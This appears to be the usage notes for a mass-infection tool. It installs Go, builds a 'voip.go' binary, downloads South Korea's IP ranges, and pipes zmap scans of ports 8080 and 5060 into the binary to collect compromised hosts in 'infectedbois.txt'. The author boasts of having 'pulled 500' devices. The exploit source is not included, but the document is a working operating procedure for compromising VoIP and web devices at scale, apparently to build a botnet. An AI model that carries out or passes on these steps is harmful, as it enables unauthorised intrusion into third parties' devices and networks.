made by @scaredfag and @thar3seller

|+| must install this |+|

cd /tmp
wget https://dl.google.com/go/go1.9.4.linux-amd64.tar.gz -q
tar -xvf go1.9.4.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
------------------------------------------------------------


1.)go build voip.go

2.) wget https://www.ipdeny.com/ipblocks/data/countries/kr.zone

3.)zmap -p 8080 -w kr.zone |./voip > infectedbois.txt
or for big boats the onw i pulled 500 with
zmap -p 5060 -w kr.zone |./voip > infectedbois.txt


